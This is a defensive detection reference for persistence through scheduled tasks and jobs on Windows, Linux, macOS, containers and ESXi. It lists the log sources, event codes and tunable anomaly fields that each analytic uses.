Detects creation or modification of scheduled tasks using schtasks.exe, at.exe, or COM objects followed by execution of outlier processes tied to the scheduled job.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | WinEventLog:Security | EventCode=4698 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| File Modification (DC0061) | WinEventLog:Sysmon | EventCode=2 |
| Field | Description |
|---|---|
| TaskAuthor | Unexpected user or account context initiating the task. |
| CommandLineRegex | Suspicious binaries or script usage tied to scheduled tasks. |
| ExecutionWindow | Lookback window to correlate process execution after task registration. |
Detects creation or modification of cron jobs via crontab, /etc/cron.* directories, or systemd timer units with execution by unusual users or non-standard intervals.
| Data Component | Name | Channel |
|---|---|---|
| File Modification (DC0061) | auditd:SYSCALL | write, rename |
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Scheduled Job Creation (DC0001) | linux:osquery | crontab, systemd_timers |
| Field | Description |
|---|---|
| CronSchedulePattern | Look for high-frequency or off-hour scheduling patterns. |
| ServiceUser | Unusual users scheduling jobs (e.g., www-data, nobody). |
| BinaryEntropy | Abnormal scripts or binaries tied to the scheduled job. |
Detects creation or alteration of LaunchAgents or LaunchDaemons with corresponding plist modification followed by execution of associated binaries.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | process launch |
| File Creation (DC0039) | fs:fsusage | disk activity on /Library/LaunchAgents or LaunchDaemons |
| Scheduled Job Creation (DC0001) | macos:osquery | launchd_jobs |
| Field | Description |
|---|---|
| PlistLabel | Labels not associated with known applications or vendors. |
| LaunchPath | Executable path outside of standard directories (/usr/bin, /Applications). |
| JobRunInterval | Unexpected periodic job intervals (e.g., every minute). |
Detects unusual use of cron or sleep loops inside containers executing unfamiliar scripts or binaries repeatedly.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| File Modification (DC0061) | containerd:runtime | file change monitoring within /etc/cron.*, /tmp, or mounted volumes |
| Field | Description |
|---|---|
| ContainerLabel | Labels or tags indicating dev/test containers executing scheduled tasks. |
| ScriptFrequency | Repetitive invocation pattern within short container lifespan. |
| ImageSource | Unexpected container image sources creating cron entries. |
Detects modification of ESXi cron jobs, local.sh scripts, or scheduled API calls to persist custom binaries or shell scripts.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | esxi:vmkernel | Startup script and task execution logs |
| Command Execution (DC0064) | esxi:hostd | shell access or job registration |
| File Modification (DC0061) | esxi:cron | manual edits to /etc/rc.local.d/local.sh or cron.d |
| Field | Description |
|---|---|
| StartupScriptName | Filename not matching expected initialization scripts. |
| ExecutionContext | Commands run from unexpected SSH sessions or elevated shells. |
| PersistenceInterval | Rare scheduling triggers (e.g., @reboot + hourly repetition). |